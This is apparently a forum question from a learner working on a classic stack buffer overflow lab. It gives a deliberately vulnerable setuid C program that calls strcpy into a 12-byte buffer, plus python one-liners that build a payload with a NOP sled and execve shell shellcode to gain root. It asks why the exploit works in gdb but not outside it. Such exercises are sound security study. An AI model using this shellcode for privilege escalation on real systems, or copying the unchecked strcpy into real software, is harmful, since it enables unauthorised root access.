I have an application with the following source code:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
Inside bof
with the strcpy(buffer, str)
i am trying to achieve privelege escalation using buffer overflow. Inside gdb with the following command i am able to open a new shell: python -c 'print "A" * 24 + "\x60\xf1\xff\xbf" + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' > badfile
Outside gdb i know that the memory address change a bit so i have tried with the same command using some nops too: python -c 'print "A" * 24 + "\x60\xf1\xff\xbf" + "\x90" * 30 + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' > badfile
I have disabled ASLR, NX bit and stack canary. Though the result of the last command above is Illegal instruction (core dumped)
What am i doing wrong here? (The suid bit of the application as root is enabled)